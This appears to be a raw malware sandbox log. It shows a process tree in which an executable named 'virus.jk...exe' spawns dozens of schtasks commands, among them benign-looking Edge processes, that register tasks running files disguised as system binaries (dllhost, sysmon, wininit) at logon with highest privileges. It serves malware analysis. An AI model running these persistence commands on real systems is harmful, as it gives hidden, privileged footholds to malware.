        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        45⤵
        
        PID:2256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'" /rl HIGHEST /f
1⤵
PID:6116

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft\sysmon.exe'" /f
1⤵
PID:4568

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
PID:1704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:6896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:6172
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc188446f8,0x7ffc18844708,0x7ffc18844718
    3⤵
    PID:6256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
    3⤵
    PID:800
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
    3⤵
    PID:7004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:8
    3⤵
    PID:4784
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
    3⤵
    PID:7872
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
    3⤵
    PID:7880
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1060 /prefetch:1
    3⤵
    PID:4276
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
    3⤵
    PID:5104
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
    3⤵
    PID:3804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
    3⤵
    PID:7460
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1
    3⤵
    PID:6660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
    3⤵
    PID:7784
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
    3⤵
    PID:5980
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
    3⤵
    PID:8132
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
    3⤵
    PID:7528
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 /prefetch:8
    3⤵
    PID:5260
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4904 /prefetch:8
    3⤵
    PID:6760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,14953519965715815735,7692289930625574800,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4948 /prefetch:8
    3⤵
    PID:7076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\sysmon.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:4480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\sysmon.exe'" /rl HIGHEST /f
1⤵
PID:3724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
1⤵
PID:5552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Java\jdk-1.8\jre\firefox.exe'" /f
1⤵
PID:5676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\jre\firefox.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Start Menu\spoolsv.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:3600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\spoolsv.exe'" /rl HIGHEST /f
1⤵
PID:5388

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Java\jdk-1.8\jre\firefox.exe'" /rl HIGHEST /f
1⤵
PID:1100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Start Menu\spoolsv.exe'" /rl HIGHEST /f
1⤵
PID:3584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Crashpad\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Crashpad\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
PID:5732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Media Player\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
PID:5596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Crashpad\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\wininit.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
PID:5644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Media Player\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "73c1c41b9e71c48e752a5cd19fe808b67" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\73c1c41b9e71c48e752a5cd19fe808b6.exe'" /f
1⤵
- Process spawned unexpected child process
PID:672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:3960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "73c1c41b9e71c48e752a5cd19fe808b6" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\73c1c41b9e71c48e752a5cd19fe808b6.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
PID:6148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4784 -ip 4784
1⤵
PID:6256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "73c1c41b9e71c48e752a5cd19fe808b67" /sc MINUTE /mo 12 /tr "'C:\Program Files\7-Zip\Lang\73c1c41b9e71c48e752a5cd19fe808b6.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TiWorkerT" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\TiWorker.exe'" /f
1⤵
PID:6696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TiWorker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\TiWorker.exe'" /rl HIGHEST /f
1⤵
PID:6964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender\de-DE\kosomk.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TiWorkerT" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\TiWorker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad472193" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /f
1⤵
- Process spawned unexpected child process
PID:3296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa7" /sc MINUTE /mo 13 /tr "'C:\Windows\Resources\Ease of Access Themes\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "kosomk" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\de-DE\kosomk.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad472193" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Multimedia Platform\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Windows\SchCache\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa7" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Ease of Access Themes\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\SchCache\sihost.exe'" /rl HIGHEST /f
1⤵
PID:6460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "938b92958ded4d50a357d22eddf141ad9" /sc MINUTE /mo 6 /tr "'C:\Windows\bcastdvr\938b92958ded4d50a357d22eddf141ad.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:3212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\de-DE\kosomk.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Windows\SchCache\sihost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "938b92958ded4d50a357d22eddf141ad" /sc ONLOGON /tr "'C:\Windows\bcastdvr\938b92958ded4d50a357d22eddf141ad.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6744 -ip 6744
1⤵
PID:6396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラックク" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\クラック.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:7016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "938b92958ded4d50a357d22eddf141ad9" /sc MINUTE /mo 5 /tr "'C:\Windows\bcastdvr\938b92958ded4d50a357d22eddf141ad.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1120

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラック" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\クラック.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "netshn" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\netsh.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "クラックク" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\クラック.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "netsh" /sc ONLOGON /tr "'C:\Users\All Users\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\netsh.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "netshn" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\netsh.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c2" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Packages\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1120

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\Temp\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
PID:6596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c" /sc ONLOGON /tr "'C:\Users\All Users\Packages\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\fr-FR\schtasks.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "see7s" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Portable Devices\see7.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c2" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Packages\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:7568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "see7" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\see7.exe'" /rl HIGHEST /f
1⤵
PID:6468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\fr-FR\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:5124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa7" /sc MINUTE /mo 5 /tr "'C:\Program Files\WindowsPowerShell\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /f
1⤵
PID:3616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "see7s" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\see7.exe'" /rl HIGHEST /f
1⤵
PID:6472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\Temp\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\fr-FR\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:6996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa7" /sc MINUTE /mo 10 /tr "'C:\Program Files\WindowsPowerShell\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
PID:7796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Windows\apppatch\ja-JP\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7048

